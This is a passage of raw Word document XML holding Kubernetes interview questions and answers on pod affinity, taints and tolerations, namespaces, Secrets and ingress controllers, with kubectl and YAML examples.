        <w:br/>
        <w:tab/>
        <w:t>Based on</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod labels</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node labels</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Goal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Co-locate workloads</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Choose correct node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of an office:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = employees</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod affinity = “Put team members in the same room/building for collaboration”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Pod affinity in Kubernetes is a scheduling feature that allows pods to be placed close to other pods based on label selectors and topology rules, enabling workload co-location to improve performance and communication efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q256. Explain taints and tolerations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Taints and tolerations in Kubernetes are mechanisms used to control which Pods are allowed to run on which Nodes.</w:t>
        <w:br/>
        <w:t>They work together to implement node-level restrictions and exceptions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Taints are applied on nodes (to repel pods)</w:t>
        <w:br/>
        <w:t>Tolerations are applied on pods (to allow them in)</w:t>
        <w:br/>
        <w:t>So:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Taint = “Stay away from me” (node says this)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Toleration = “I can tolerate this condition” (pod says this)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Taints</w:t>
        <w:br/>
        <w:t>A taint is applied to a node to prevent unwanted pods from scheduling there.</w:t>
        <w:br/>
        <w:t>Format:</w:t>
        <w:br/>
        <w:t>key=value:effect</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Effects of taints</w:t>
        <w:br/>
        <w:t>1. NoSchedule</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods without toleration will NOT be scheduled</w:t>
        <w:br/>
        <w:t>2. PreferNoSchedule</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes tries to avoid placing pods, but not strict</w:t>
        <w:br/>
        <w:t>3. NoExecute</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Existing pods are also evicted immediately</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example taint</w:t>
        <w:br/>
        <w:t>kubectl taint nodes node1 key=dedicated:NoSchedule</w:t>
        <w:br/>
        <w:t>This means:</w:t>
        <w:br/>
        <w:t>“Do not schedule normal pods on this node”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Tolerations</w:t>
        <w:br/>
        <w:t>A toleration is defined in a Pod to allow it to be scheduled onto a tainted node.</w:t>
        <w:br/>
        <w:t>It does NOT force scheduling—only allows it.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example toleration</w:t>
        <w:br/>
        <w:t>tolerations:</w:t>
        <w:br/>
        <w:t>- key: "dedicated"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  operator: "Equal"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  value: "dev"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  effect: "NoSchedule"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:t>“This pod is allowed to run on nodes tainted with dedicated=dev:NoSchedule”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How they work together</w:t>
        <w:br/>
        <w:t>Node (Taint)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod (Toleration)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Result</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No taint</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Any pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Allowed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Taint exists</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No toleration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Blocked</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Taint exists</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Matching toleration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Allowed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t>1. Dedicated nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GPU nodes only for ML workloads</w:t>
        <w:br/>
        <w:t>2. System nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Only system pods allowed</w:t>
        <w:br/>
        <w:t>3. Isolation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Separate dev / prod workloads</w:t>
        <w:br/>
        <w:t>4. Critical workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensure important services get reserved nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>Node:</w:t>
        <w:br/>
        <w:t>kubectl taint nodes gpu-node gpu=true:NoSchedule</w:t>
        <w:br/>
        <w:t>Pod:</w:t>
        <w:br/>
        <w:t>tolerations:</w:t>
        <w:br/>
        <w:t>- key: "gpu"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  operator: "Equal"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  value: "true"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  effect: "NoSchedule"</w:t>
        <w:br/>
        <w:t>Only GPU-enabled pods can run there.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important concept</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Taints repel pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tolerations do not attract pods</w:t>
        <w:br/>
        <w:t>To attract pods, you need:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node affinity or nodeSelector</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Taints vs Node Affinity</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Taints &amp; Tolerations</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node Affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Block unwanted pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prefer/require nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Direction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node → Pod (repel)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod → Node (select)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Placement control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a club:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Taint = “VIP-only entry”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Toleration = “I have VIP pass”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node affinity = “I want to go to this club”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Taints and tolerations in Kubernetes are mechanisms used to control pod scheduling by allowing nodes to repel certain pods using taints, while pods can explicitly declare tolerations to override these restrictions and be scheduled onto those nodes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q257. What are namespaces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Namespaces in Kubernetes are a way to logically divide a cluster into isolated virtual environments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A namespace is a “virtual cluster inside a cluster” used to organize and isolate resources.</w:t>
        <w:br/>
        <w:t>It helps you group and separate Kubernetes objects like Pods, Services, and Deployments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why namespaces are used</w:t>
        <w:br/>
        <w:t>Namespaces help you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Separate environments (dev, staging, prod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Organize teams or projects</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Control access using RBAC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apply resource quotas per group</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid name conflicts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>You can have:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * dev namespace → development workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * prod namespace → production workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * monitoring namespace → observability tools</w:t>
        <w:br/>
        <w:t>Same service name can exist in different namespaces:</w:t>
        <w:br/>
        <w:t>nginx.dev</w:t>
        <w:br/>
        <w:t>nginx.prod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Every Kubernetes resource belongs to a namespace (unless it’s cluster-wide)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resources are isolated logically, not physically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You must specify namespace when querying resources:</w:t>
        <w:br/>
        <w:t>kubectl get pods -n dev</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Default namespaces in Kubernetes</w:t>
        <w:br/>
        <w:t>1. default</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Where resources go if no namespace is specified</w:t>
        <w:br/>
        <w:t>2. kube-system</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * System components (DNS, scheduler, controller-manager)</w:t>
        <w:br/>
        <w:t>3. kube-public</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Publicly readable resources</w:t>
        <w:br/>
        <w:t>4. kube-node-lease</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node heartbeat information</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is isolated in namespaces?</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ConfigMaps</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Secrets</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is NOT isolated?</w:t>
        <w:br/>
        <w:t>Some resources are cluster-wide:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PersistentVolumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ClusterRoles</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CustomResourceDefinitions (CRDs)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example namespace YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Namespace</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: dev</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Resource control with namespaces</w:t>
        <w:br/>
        <w:t>You can apply:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ResourceQuotas (CPU/memory limits per namespace)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NetworkPolicies (traffic isolation)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RBAC rules (access control per namespace)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Namespace vs cluster</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Logical isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Physical infrastructure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Soft isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Hard isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multi-team sharing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Separate environments</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a Kubernetes cluster as a building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster = building</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Namespaces = different floors or departments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = rooms inside those departments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A namespace in Kubernetes is a logical partition within a cluster that allows multiple virtual environments to coexist by isolating and organizing resources such as pods, services, and deployments for better management, access control, and resource allocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q258. Explain ConfigMaps.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q259. What are Secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secrets in Kubernetes are API objects used to store and manage sensitive information securely, such as passwords, tokens, and keys.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Secrets are like ConfigMaps, but specifically designed for sensitive data.</w:t>
        <w:br/>
        <w:t>They help avoid hardcoding credentials inside container images or code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Secrets are used</w:t>
        <w:br/>
        <w:t>Without Secrets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Passwords/API keys get exposed in code or images</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hard to rotate credentials</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security risk in shared environments</w:t>
        <w:br/>
        <w:t>With Secrets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sensitive data is managed centrally</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Access can be controlled</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easier to rotate and update credentials</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Secrets store</w:t>
        <w:br/>
        <w:t>Common examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Database passwords</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * API tokens</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TLS certificates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SSH keys</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * OAuth credentials</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Secrets are stored</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data is stored as Base64 encoded values</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not encrypted by default (encryption at rest must be enabled separately in cluster config)</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>username: YWRtaW4=   # admin</w:t>
        <w:br/>
        <w:t>password: cGFzc3dvcmQ= # password</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Secrets</w:t>
        <w:br/>
        <w:t>1. Opaque (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Generic key-value secrets</w:t>
        <w:br/>
        <w:t>2. docker-registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Credentials for pulling images from private registries</w:t>
        <w:br/>
        <w:t>3. tls</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TLS certificates and private keys</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Ways to use Secrets</w:t>
        <w:br/>
        <w:t>1. Environment variables</w:t>
        <w:br/>
        <w:t>env:</w:t>
        <w:br/>
        <w:t>- name: DB_PASSWORD</w:t>
        <w:br/>
        <w:t xml:space="preserve">  valueFrom:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    secretKeyRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: db-secret</w:t>
        <w:br/>
        <w:t xml:space="preserve">      key: password</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Mounted as volume (file-based)</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t>- name: secret-volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">  secret:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    secretName: db-secret</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Image pull secrets</w:t>
        <w:br/>
        <w:t>Used to pull images from private registries.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Secret YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Secret</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: db-secret</w:t>
        <w:br/>
        <w:t>type: Opaque</w:t>
        <w:br/>
        <w:t>data:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  username: YWRtaW4=</w:t>
        <w:br/>
        <w:t xml:space="preserve">  password: cGFzc3dvcmQ=</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ConfigMap vs Secret</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ConfigMap</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Secret</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Non-sensitive config</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sensitive data</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Encoding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Plain text</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Base64 encoded</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher (with encryption support)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>log level, env settings</w:t>
        <w:br/>
        <w:tab/>
        <w:t>passwords, API keys</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important security notes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Base64 ≠ encryption (it is just encoding)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enable encryption at rest in etcd for real security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use RBAC to restrict access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid exposing secrets in logs or environment dumps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ConfigMap = normal configuration file</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Secret = locked safe containing credentials</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Secret in Kubernetes is an API object used to securely store and manage sensitive information such as passwords, tokens, and certificates, allowing applications to consume them without embedding them directly into code or container images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q260. Explain service accounts.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q261. Explain ClusterRole.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q262. What is RoleBinding?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q263. What is ingress controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An Ingress Controller in Kubernetes is the actual component that processes Ingress rules and routes external HTTP/HTTPS traffic to services inside the cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Ingress (resource) = rules</w:t>
        <w:br/>
        <w:t>Ingress Controller = engine that makes those rules work</w:t>
        <w:br/>
        <w:t>Without an Ingress Controller, an Ingress object does nothing.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is needed</w:t>
        <w:br/>
        <w:t>Kubernetes only defines what should happen (Ingress rules), but not how to implement it.</w:t>
        <w:br/>
        <w:t>So the Ingress Controller:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Watches Ingress resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reads routing rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configures a proxy/load balancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Routes traffic to backend Services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it does</w:t>
        <w:br/>
        <w:t>1. Watches Ingress objects</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuously monitors changes in Ingress resources via API server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Configures routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Translates rules into actual network configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Uses a reverse proxy like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NGINX</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HAProxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traefik</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS ALB</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Handles external traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accepts HTTP/HTTPS requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Routes them based on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Host (domain)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Path (/api, /app)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Forwards to correct Kubernetes Service</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Manages TLS</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles SSL/TLS termination</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Manages certificates (manual or via cert-manager)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. User creates Ingress resource</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Ingress Controller detects it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Controller configures routing rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. External request arrives</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Controller routes request → Service → Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example architecture</w:t>
        <w:br/>
        <w:t>Internet</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Ingress Controller (NGINX / ALB)</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Kubernetes Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Ingress Controllers</w:t>
        <w:br/>
        <w:t>1. NGINX Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Most widely used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Open source</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Flexible routing</w:t>
        <w:br/>
        <w:t>2. Traefik</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easy configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Built-in dashboard</w:t>
        <w:br/>
        <w:t>3. HAProxy Ingress</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High performance</w:t>
        <w:br/>
        <w:t>4. Cloud-native controllers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS ALB Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GKE Ingress Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Azure Application Gateway</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key responsibilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing HTTP/HTTPS traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Path-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Host-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SSL termination</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic management and rewrites</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Ingress vs Ingress Controller</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ingress</w:t>
        <w:br/>
